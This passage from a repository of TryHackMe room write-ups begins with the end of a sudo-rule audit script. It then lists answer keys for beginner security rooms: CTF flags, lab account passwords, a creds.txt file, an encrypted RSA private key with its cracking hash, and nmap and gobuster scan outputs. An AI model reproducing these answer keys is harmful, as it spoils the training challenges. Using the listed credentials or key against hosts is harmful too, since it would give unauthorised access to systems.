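if __name__ == "__main__":
    for f in audit():
        print("%-8s %s@%s: %s (NOPASSWD=%s)"
              % (f["severity"], f["user"], f["host"], f["command"], f["nopasswd"]))
```

A rule that names a specific binary is not safer than `ALL` when that binary can exec a shell, so the fix in both transcripts is the same: drop the rule, or restrict the user to a wrapper script that performs only the intended action.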

--------------------------------------------------------------------------------
/Intro to Malware Analysis/README.md:
--------------------------------------------------------------------------------
# Intro to Malware Analysis | https://tryhackme.com/room/malwareanalysisprimer

### [Task 2] Understanding Malware Campaigns

#1 What is the famous example of a targeted attack-esque Malware that targeted Iran? : `Stuxnet`

#2 What is the name of the Ransomware that used the Eternalblue exploit in a "Mass Campaign" attack? : `Wannacry`

### [Task 3] Identifying if a Malware Attack has Happened

#1 Name the first essential step of a Malware Attack? : `Delivery`

#2 Now name the second essential step of a Malware Attack? : `Execution`

#3 What type of signature is used to classify remnants of infection on a host? : `Host-Based Signatures`

#4 What is the name of the other classification of signature used after a Malware attack? : `Network-Based Signatures`

### [Task 7] Obtaining MD5 Checksums of Provided Files

#1 The MD5 Checksum of aws.exe : `D2778164EF643BA8F44CC202EC7EF157`

#2 The MD5 Checksum of Netlogo.exe : `59CB421172A89E1E16C11A428326952C`

#3 The MD5 Checksum of vlc.exe : `5416BE1B8B04B1681CB39CF0E2CAAD9F`

### [Task 8] Now let's see if the MD5 Checksums have been analysed before

#1 Does Virustotal report this MD5 Checksum / file aws.exe as malicious? (Yay/Nay) : `Nay`

#2 Does Virustotal report this MD5 Checksum / file Netlogo.exe as malicious? (Yay/Nay) : `Nay`

#3 Does Virustotal report this MD5 Checksum / file vlc.exe as malicious? (Yay/Nay) : `Nay`

### [Task 9] Identifying if the Executables are obfuscated / packed

#1 What does PeID propose 1DE9176AD682FF.dll being packed with? : `Microsoft Visual C++ 6.0 DLL`

#2 What does PeID propose AD29AA1B.bin being packed with? : `Microsoft Visual C++ 6.0`

### [Task 10] What is Obfuscation / Packing?

#1 What packer does PeID report file "6F431F46547DB2628" to be packed with? : `FSG 1.0 -> dulek/xt`

### [Task 12] Introduction to Strings

#1 What is the URL that is outputted after using "strings"? : `practicalmalwareanalysis.com`

#2 How many unique "Imports" are there? : `5`

### [Task 13] Introduction to Imports

#1 How many references are there to the library "msi" in the "Imports" tab of IDA Freeware for "install.exe"? : `9`

### [Task 14] Practical Summary

#1 What is the MD5 Checksum of the file? : `f5bd8e6dc6782ed4dfa62b8215bdc429`

#2 Does Virustotal report this file as malicious? (Yay/Nay) : `Nay`

#3 Output the strings using Sysinternals "strings" tool. What is the last string outputted? : `d:h:`

#4 What is the output of PeID when trying to detect what packer is used by the file? : `Nothing Found`
--------------------------------------------------------------------------------
/Introductory Researching/README.md:
--------------------------------------------------------------------------------
# Introductory Researching | https://tryhackme.com/room/introtoresearch

### [Task 2] Example Research Question

#1 : In the Burp Suite Program that ships with Kali Linux, what mode would you use to manually send a request (often repeating a captured request numerous times)? : ```Repeater```

#2 : What hash format are modern Windows login passwords stored in? : ```NTLM```

#3 : What are automated tasks called in Linux? : ```cron jobs```

#4 : What number base could you use as a shorthand for base 2 (binary)? : ```base 16```

#5 : If a password hash starts with $6$, what format is it (Unix variant)? : ```sha512crypt```

### [Task 3] Vulnerability Searching

#1 : What is the CVE for the 2020 Cross-Site Scripting (XSS) vulnerability found in WPForms? : ```CVE-2020-10385```

#2 : There was a Local Privilege Escalation vulnerability found in the Debian version of Apache Tomcat, back in 2016. What's the CVE for this vulnerability? : ```CVE-2016-1240```

#3 : What is the very first CVE found in the VLC media player? : ```CVE-2007-0017```

#4 : If I wanted to exploit a 2020 buffer overflow in the sudo program, which CVE would I use? : ```CVE: 2019-18634```

### [Task 4] Manual Pages

#1 : SCP is a tool used to copy files from one computer to another. What switch would you use to copy an entire directory? : ```-r```

#2 : fdisk is a command used to view and alter the partitioning scheme used on your hard drive. What switch would you use to list the current partitions? : ```-l```

#3 : nano is an easy-to-use text editor for Linux. There are arguably better editors (Vim, being the obvious choice); however, nano is a great one to start with. What switch would you use to make a backup when opening a file with nano? : ```-B```

#4 : Netcat is a basic tool used to manually send and receive network requests. What command would you use to start netcat in listen mode, using port 12345?
: ```nc -l -p 12345``` 34 | -------------------------------------------------------------------------------- /Learn Linux/README.md: -------------------------------------------------------------------------------- 1 | # Learn Linux | https://tryhackme.com/room/zthlinux 2 | 3 | ### [Task 6] [Section 2: Running Commands] - Manual Pages and Flags 4 | 5 | 1 - How would you output hello without a newline : `echo -n hello` 6 | 7 | ### [Task 7] [Section 3: Basic File Operations] - ls 8 | 9 | 1 - What flag outputs all entries : `-a` 10 | 11 | 2 - What flag outputs things in a "long list" format : `-l` 12 | 13 | ### [Task 8] [Section 3: Basic File Operations] - cat 14 | 15 | 1 - What flag numbers all output lines? : `-n` 16 | 17 | ### [Task 10] [Section 3: Basic File Operations] - Running A Binary 18 | 19 | 1 - How would you run a binary called hello using the directory shortcut . ? : `./hello` 20 | 21 | 2 - How would you run a binary called hello in your home directory using the shortcut ~ ? : `~/hello` 22 | 23 | 3 - How would you run a binary called hello in the previous directory using the shortcut .. ? : `../hello` 24 | 25 | ### [Task 11] Binary - Shiba1 26 | 27 | 1 - What's the password for shiba2 : `pinguftw` 28 | 29 | 30 | 31 | ### [Task 12] su 32 | 33 | 1 - How do you specify which shell is used when you login? 
: `-s` 34 | 35 | ### [Task 14] [Section 4: Linux Operators]: ">" 36 | 37 | 1 - How would you output twenty to a file called test : `echo twenty > test` 38 | 39 | ### [Task 18] [Section 4: Linux Operators]: "$" 40 | 41 | 1 - How would you set nootnoot equal to 1111 : `export nootnoot=1111` 42 | 43 | 2 - What is the value of the home environment variable : `/home/shiba2` 44 | 45 | ### [Task 21] Binary - shiba2 46 | 47 | 1 - What is shiba3's password : `happynootnoises` 48 | 49 | 50 | 51 | ### [Task 24] [Section 5: Advanced File Operations]: chmod 52 | 53 | 1 - What permissions mean the user can read the file, the group can read and write to the file, and no one else can read, write or execute the file? : `460` 54 | 55 | 2 - What permissions mean the user can read, write, and execute the file, the group can read, write, and execute the file, and everyone else can read, write, and execute the file. : `777` 56 | 57 | ### [Task 25] [Section 5: Advanced File Operations] - chown 58 | 59 | 1 - How would you change the owner of file to paradox : `chown paradox file` 60 | 61 | 2 - What about the owner and the group of file to paradox : `chown paradox:paradox file` 62 | 63 | 3 - What flag allows you to operate on every file in the directory at once? : `-R` 64 | 65 | ### [Task 26] [Section 5: Advanced File Operations] - rm 66 | 67 | 1 - What flag deletes every file in a directory : `-r` 68 | 69 | 2 - How do you suppress all warning prompts : `-f` 70 | 71 | ### [Task 27] [Section 5: Advanced File Operations] - mv 72 | 73 | 1 - How would you move file to /tmp : `mv file /tmp` 74 | 75 | ### [Task 29] [Section 5: Advanced file Operations] - cd && mkdir 76 | 77 | 1 - Using relative paths, how would you cd to your home directory. 
: `cd ~` 78 | 79 | 2 - Using absolute paths how would you make a directory called test in /tmp : `mkdir /tmp/test` 80 | 81 | ### [Task 30] [Section 5: Advanced File Operations] ln 82 | 83 | 1 - How would I link /home/test/testfile to /tmp/test : `ln /home/test/testfile /tmp/test` 84 | 85 | ### [Task 31] [Section 5 - Advanced File Operations]: find 86 | 87 | 1 - How do you find files that have specific permissions? : `-perm` 88 | 89 | 2 - How would you find all the files in /home : `find /home` 90 | 91 | 3 - How would you find all the files owned by paradox on the whole system : `find / -user paradox` 92 | 93 | ### [Task 32] [Section 5: Advanced File Operations] - grep 94 | 95 | 1 - What flag lists line numbers for every string found? : `-n` 96 | 97 | 2 - How would I search for the string boop in the file aaaa in the directory /tmp : `grep boop /tmp/aaaa` 98 | 99 | ### [Task 33] Binary - Shiba3 100 | 101 | 1 - What is shiba4's password : `test1234` 102 | 103 | 104 | 105 | 106 | 107 | ### [Task 35] [Section 6: Miscellaneous]: sudo 108 | 109 | 1 - How do you specify which user you want to run a command as. : `-u` 110 | 111 | 2 - How would I run whoami as user jen? : `sudo -u jen whoami` 112 | 113 | 3 - How do you list your current sudo privileges(what commands you can run, who you can run them as etc.) : `-l` 114 | 115 | ### [Task 36] [Section 6: Miscellaneous]: Adding users and groups 116 | 117 | 1 - How would I add the user test to the group test : `sudo usermod -a -G test test` 118 | 119 | ### [Task 43] Bonus Challenge - The True Ending 120 | 121 | 1 - Finish this room off! 
What is the root.txt flag : `ad91979868d06e19d8e8a9c28be56e0c` 122 | 123 | 124 | 125 | 126 | 127 | 128 | -------------------------------------------------------------------------------- /Learn Linux/creds.txt: -------------------------------------------------------------------------------- 1 | shiba1 : shiba1 2 | 3 | shiba2 : pinguftw 4 | 5 | shiba3 : happynootnoises 6 | 7 | shiba4 : test1234 8 | 9 | nootnoot : notsofast -------------------------------------------------------------------------------- /Learn Linux/find-shiba4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/find-shiba4.png -------------------------------------------------------------------------------- /Learn Linux/find_user.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/find_user.png -------------------------------------------------------------------------------- /Learn Linux/flag.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/flag.png -------------------------------------------------------------------------------- /Learn Linux/shiba2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/shiba2.png -------------------------------------------------------------------------------- /Learn Linux/shiba3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/shiba3.png 
-------------------------------------------------------------------------------- /Learn Linux/shiba4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/shiba4.png -------------------------------------------------------------------------------- /Learn Linux/test1234.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Learn Linux/test1234.png -------------------------------------------------------------------------------- /Lord of the Root/README.md: -------------------------------------------------------------------------------- 1 | # Lord of the Root | https://tryhackme.com/room/lordoftheroot 2 | 3 | ### [Task 2] Can you root the box? 4 | 5 | #2 Hmmm, what method is used to reveal hidden ports? : ```port knocking``` 6 | 7 | #3 What port is the hidden service on? : ```1337``` 8 | 9 | #6 Whats the method to exploit the system for privilege escalation called? : ```buffer overflow``` 10 | 11 | #7 Who wrote the message in the flag message in the roots home directory? 
: ```Gandalf``` 12 | -------------------------------------------------------------------------------- /Lord of the Root/creds.txt: -------------------------------------------------------------------------------- 1 | smeagol : MyPreciousR00t -------------------------------------------------------------------------------- /Lord of the Root/exploit.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/Lord of the Root/exploit.rar -------------------------------------------------------------------------------- /Lord of the Root/nmap_10.10.213.122.txt: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Sun Mar 22 17:12:31 2020 as: nmap -sV -sS -sC -A -O -oN nmap_10.10.213.122.txt 10.10.213.122 2 | Nmap scan report for 10.10.213.122 3 | Host is up (0.22s latency). 4 | Not shown: 999 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0) 7 | | ssh-hostkey: 8 | | 1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA) 9 | | 2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA) 10 | | 256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA) 11 | |_ 256 34:ec:16:dd:a7:cf:2a:86:45:ec:65:ea:05:43:89:21 (ED25519) 12 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 
13 | TCP/IP fingerprint: 14 | OS:SCAN(V=7.80%E=4%D=3/22%OT=22%CT=1%CU=44571%PV=Y%DS=2%DC=T%G=Y%TM=5E774F4 15 | OS:A%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=106%TI=Z%II=I%TS=8)SEQ(SP=1 16 | OS:05%GCD=1%ISR=106%TI=Z%CI=I%II=I%TS=8)OPS(O1=M54DST11NW6%O2=M54DST11NW6%O 17 | OS:3=M54DNNT11NW6%O4=M54DST11NW6%O5=M54DST11NW6%O6=M54DST11)WIN(W1=68DF%W2= 18 | OS:68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M54DNNSN 19 | OS:W6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%D 20 | OS:F=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O 21 | OS:=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W 22 | OS:=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%R 23 | OS:IPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S) 24 | 25 | Network Distance: 2 hops 26 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 27 | 28 | TRACEROUTE (using port 110/tcp) 29 | HOP RTT ADDRESS 30 | 1 252.23 ms 10.9.0.1 31 | 2 252.44 ms 10.10.213.122 32 | 33 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 34 | # Nmap done at Sun Mar 22 17:13:06 2020 -- 1 IP address (1 host up) scanned in 35.02 seconds 35 | -------------------------------------------------------------------------------- /Lord of the Root/nmap_allport_10.10.213.122.txt: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Sun Mar 22 17:16:17 2020 as: nmap -sS -p- -vv --script vuln -oN nmap_allport_10.10.213.122.txt 10.10.213.122 2 | Increasing send delay for 10.10.213.122 from 0 to 5 due to 880 out of 2932 dropped probes since last increase. 3 | Nmap scan report for 10.10.213.122 4 | Host is up, received echo-reply ttl 63 (0.21s latency). 
5 | Scanned at 2020-03-22 17:16:27 IST for 1180s 6 | Not shown: 65533 closed ports 7 | Reason: 65533 resets 8 | PORT STATE SERVICE REASON 9 | 22/tcp open ssh syn-ack ttl 63 10 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 11 | 1337/tcp open waste syn-ack ttl 63 12 | |_clamav-exec: ERROR: Script execution failed (use -d to debug) 13 | 14 | Read data files from: /usr/bin/../share/nmap 15 | # Nmap done at Sun Mar 22 17:36:07 2020 -- 1 IP address (1 host up) scanned in 1190.68 seconds 16 | -------------------------------------------------------------------------------- /Mr. Robot CTF/README.md: -------------------------------------------------------------------------------- 1 | # Mr. ROBOT CTF | https://tryhackme.com/room/mrrobot 2 | 3 | ### [Task 2] Hack the machine 4 | 5 | Can you root this Mr. Robot styled machine? This is a virtual machine meant for beginners/intermediate users. There are 3 hidden keys located on the machine, can you find them? 6 | 7 | #1 What is key 1? : ```073403c8a58a1f80d943455fb30724b9``` 8 | 9 | #2 What is key 2? : ```822c73956184f694993bede3eb39f959``` 10 | 11 | #3 What is key 3? : ```04787ddef27c3dee1ee161b21670b4e4``` 12 | -------------------------------------------------------------------------------- /OWASP Juice Shop/README.md: -------------------------------------------------------------------------------- 1 | # OWASP Juice Shop | https://tryhackme.com/room/juiceshop 2 | 3 | ### [Task 5] Broken Authentication 4 | 5 | #1 reset Jim's password using the forgotten password mechanism - what was the answer to the secret question? : `Samuel` 6 | 7 | #2 What is the administrator password? : `admin123` 8 | 9 | ### [Task 6] Sensitive Data Exposure 10 | 11 | #1 Access a confidential document and enter the name of the first file with the extension ".md" : `acquisitions.md` 12 | 13 | ### [Task 7] Broken Access Control 14 | 15 | #1 Access the administration section of the store - What is the name of the page? 
: `administration` 16 | -------------------------------------------------------------------------------- /OhSINT/README.md: -------------------------------------------------------------------------------- 1 | # OhSINT | https://tryhackme.com/room/ohsint 2 | 3 | ### [Task 1] OhSINT 4 | 5 | What information can you possible get starting with just one photo? 6 | 7 | #1 What is this users avatar of? : ```cat``` 8 | 9 | #2 What city is this person in? : ```London``` 10 | 11 | #3 Whats the SSID of the WAP he connected to? : ```UnileverWiFi``` 12 | 13 | #4 What is his personal email address? : ```OWoodflint@gmail.com``` 14 | 15 | #5 What site did you find his email address on? : ```Github``` 16 | 17 | #6 Where has he gone on holiday? : ```New York``` 18 | 19 | #7 What is this persons password? : ```pennYDr0pper.!``` 20 | -------------------------------------------------------------------------------- /OhSINT/WindowsXP.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thehackingsage/tryhackme/3fa7bb79139d4098f0abf13bc65d742f3ad7fa25/OhSINT/WindowsXP.jpg -------------------------------------------------------------------------------- /OpenVPN/README.md: -------------------------------------------------------------------------------- 1 | OpenVPN | https://tryhackme.com/room/openvpn 2 | 3 | ### [Task 5] Check you're connected 4 | 5 | #1 What is the flag displayed on the deployed machine's website? 
: `flag{connection_verified}` 6 | -------------------------------------------------------------------------------- /Overpass/README.md: -------------------------------------------------------------------------------- 1 | # Overpass | https://tryhackme.com/room/overpass 2 | 3 | ### [Task 1] Overpass 4 | 5 | #1 Hack the machine and get the flag in user.txt : `thm{65c1aaf000506e56996822c6281e6bf7}` 6 | 7 | #2 Escalate your privileges and get the flag in root.txt : `thm{7f336f8c359dbac18d54fdd64ea753bb}` 8 | -------------------------------------------------------------------------------- /Overpass/gobuster.txt: -------------------------------------------------------------------------------- 1 | 301 - /admin 2 | 301 - /aboutus 3 | 301 - /css 4 | 301 - /downloads 5 | 301 - /img 6 | 301 - /index.html 7 | -------------------------------------------------------------------------------- /Overpass/id_rsa: -------------------------------------------------------------------------------- 1 | -----BEGIN RSA PRIVATE KEY----- 2 | Proc-Type: 4,ENCRYPTED 3 | DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337 4 | 5 | LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN 6 | JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal 7 | 73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT 8 | WDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdv 9 | BMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZ 10 | AL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR 11 | 3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUf 12 | ABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk 13 | VfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeR 14 | OkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P 15 | 9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze 16 | eaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ 17 | 
4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8 18 | GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYn 19 | exxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy 20 | AIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk 21 | 6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58 22 | dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i 23 | n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT 24 | 8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K 25 | 4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z 26 | ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS 27 | 49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2 28 | +hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk 29 | 2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7 30 | -----END RSA PRIVATE KEY----- 31 | -------------------------------------------------------------------------------- /Overpass/id_rsa_hash: -------------------------------------------------------------------------------- 1 | id_rsa:$sshng$1$16$9F85D92F34F42626F13A7493AB48F337$1200$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 2 | -------------------------------------------------------------------------------- /Overpass/nmap_basic.nmap: -------------------------------------------------------------------------------- 1 | # Nmap 7.80 scan initiated Sun Aug 9 12:30:19 2020 as: nmap -sCVS -A -O -oN nmap_basic.nmap 10.10.108.198 2 | Nmap scan report for 10.10.108.198 3 | Host is up (0.23s latency). 
4 | Not shown: 998 closed ports 5 | PORT STATE SERVICE VERSION 6 | 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) 7 | | ssh-hostkey: 8 | | 2048 37:96:85:98:d1:00:9c:14:63:d9:b0:34:75:b1:f9:57 (RSA) 9 | | 256 53:75:fa:c0:65:da:dd:b1:e8:dd:40:b8:f6:82:39:24 (ECDSA) 10 | |_ 256 1c:4a:da:1f:36:54:6d:a6:c6:17:00:27:2e:67:75:9c (ED25519) 11 | 80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API) 12 | |_http-title: Overpass 13 | No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). 14 | TCP/IP fingerprint: 15 | OS:SCAN(V=7.80%E=4%D=8/9%OT=22%CT=1%CU=31899%PV=Y%DS=2%DC=T%G=Y%TM=5F2F9F35 16 | OS:%P=x86_64-pc-linux-gnu)SEQ(SP=FB%GCD=1%ISR=104%TI=Z%CI=Z%II=I%TS=A)OPS(O 17 | OS:1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST11N 18 | OS:W7%O6=M508ST11)WIN(W1=F4B3%W2=F4B3%W3=F4B3%W4=F4B3%W5=F4B3%W6=F4B3)ECN(R 19 | OS:=Y%DF=Y%T=40%W=F507%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS% 20 | OS:RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y 21 | OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R 22 | OS:%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T= 23 | OS:40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S 24 | OS:) 25 | 26 | Network Distance: 2 hops 27 | Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel 28 | 29 | TRACEROUTE (using port 80/tcp) 30 | HOP RTT ADDRESS 31 | 1 231.50 ms 10.9.0.1 32 | 2 237.43 ms 10.10.108.198 33 | 34 | OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
35 | # Nmap done at Sun Aug 9 12:31:09 2020 -- 1 IP address (1 host up) scanned in 50.20 seconds 36 | -------------------------------------------------------------------------------- /Overpass/root.txt: -------------------------------------------------------------------------------- 1 | thm{7f336f8c359dbac18d54fdd64ea753bb} 2 | -------------------------------------------------------------------------------- /Overpass/ssh_creds.txt: -------------------------------------------------------------------------------- 1 | ssh -i id_rsa James@10.10.108.198 : James13 2 | -------------------------------------------------------------------------------- /Overpass/todo.txt: -------------------------------------------------------------------------------- 1 | To Do: 2 | > Update Overpass' Encryption, Muirland has been complaining that it's not strong enough 3 | > Write down my password somewhere on a sticky note so that I don't forget it. 4 | Wait, we make a password manager. Why don't I just use that? 5 | > Test Overpass for macOS, it builds fine but I'm not sure it actually works 6 | > Ask Paradox how he got the automated build script working and where the builds go. 7 | They're not updating on the website 8 | -------------------------------------------------------------------------------- /Overpass/user.txt: -------------------------------------------------------------------------------- 1 | thm{65c1aaf000506e56996822c6281e6bf7} 2 | -------------------------------------------------------------------------------- /Pentest Questionaire/README.md: -------------------------------------------------------------------------------- 1 | # Pentest Questionaire | https://tryhackme.com/room/pentestquestionaire 2 | 3 | ### [Task 1] Do you know all the answers? 
4 | 5 | Basic questions related to penetration testing 6 | 7 | #1 A very popular port scanner used in assessments : `nmap` 8 | 9 | #2 Flag used to load a list of hosts : `-iL` 10 | 11 | #3 Command line vulnerability scanner : `nikto` 12 | 13 | #4 Popular packet analyzer tool having a GUI : `wireshark` 14 | 15 | #5 Online platform to search for exploits. : `exploit-db` 16 | 17 | #6 First phase of the penetration test : `reconnaissance` 18 | 19 | #7 Common penetration testing framework used across multiple platforms : `metasploit` 20 | 21 | #8 A vulnerability assessment framework developed by Tenable : `nessus` 22 | 23 | #9 Automated tool to exploit SQL Injections : `sqlmap` 24 | 25 | #10 Vulnerability which when exploited can send commands to the operating system : `os injection` 26 | 27 | #11 A vulnerability which pops an alert box : `xss` 28 | 29 | #12 You do it horizontally and laterally : `privilege escalation` 30 | 31 | #13 Windows SMB exploit : `eternal blue` 32 | 33 | #14 Vulnerability by which the attacker can include local files (short name) : `lfi` 34 | 35 | #15 Vulnerability by which the attacker can include remote files(short name) : `rfi` 36 | -------------------------------------------------------------------------------- /PentestQuiz/README.md: -------------------------------------------------------------------------------- 1 | # PentestQuiz | https://tryhackme.com/room/pentestquiz 2 | 3 | ### [Task 1] Getting better at doing "Google Searches" 4 | 5 | Getting better at using "Search Engines" in order to find the right answers in less time is an art. This room is all about quick challenges which most of the n00bs like me already have in mind and don't really require a "Google Search" but for some of the n00bs it is still remained to be learnt! 6 | 7 | #1 Famous port scanner. Can you name it? : ```nmap``` 8 | 9 | #2 Famous network packet analyzer. Can you name it? : ```wireshark``` 10 | 11 | #3 Best place to find public exploits? 
: ```exploit-db``` 12 | 13 | #4 Best place to find google dorks? : ```ghdb``` 14 | 15 | #5 Entering enough data to make the application crash! : ```buffer overflow``` 16 | 17 | #6 I am a security bug but not known to anyone yet? : ```0day``` 18 | 19 | #7 "Your system has been locked, Pay me the money!" : ```ransomware``` 20 | 21 | #8 Group of compromised machines connected to a C&C server! : ```botnet``` 22 | 23 | #9 Name the organization that releases TOP 10 Web and Mobile vulnerabilities? : ```owasp``` 24 | 25 | #10 Name the famous worm which targeted SCADA environments? : ```stuxnet``` 26 | 27 | #11 Art of hiding information in other files! : ```steganography``` 28 | 29 | #12 Converting readable data into unreadable format! : ```encryption``` 30 | 31 | #13 Name the tool used for reading metadata of images! : ```exiftool``` 32 | 33 | #14 Famous Web Application Proxy Tool? : ```burp suite``` 34 | 35 | #15 NSA Reverse Engineering Tool? : ```Ghidra``` 36 | 37 | #16 Famous Open Source Web Application Proxy Tool? : ```OWASP ZAP``` 38 | -------------------------------------------------------------------------------- /Pickle Rick/README.md: -------------------------------------------------------------------------------- 1 | # Pickle Rick | https://tryhackme.com/room/picklerick 2 | 3 | ### [Task 1] Pickle Rick 4 | 5 | This Rick and Morty themed challenge requires you to exploit a webserver to find 3 ingredients that will help Rick make his potion to transform himself back into a human from a pickle. 6 | 7 | #1 What is the first ingredient Rick needs? : `mr. meeseek hair` 8 | 9 | #2 Whats the second ingredient Rick needs? : `1 jerry tear` 10 | 11 | #3 Whats the final ingredient Rick needs? 
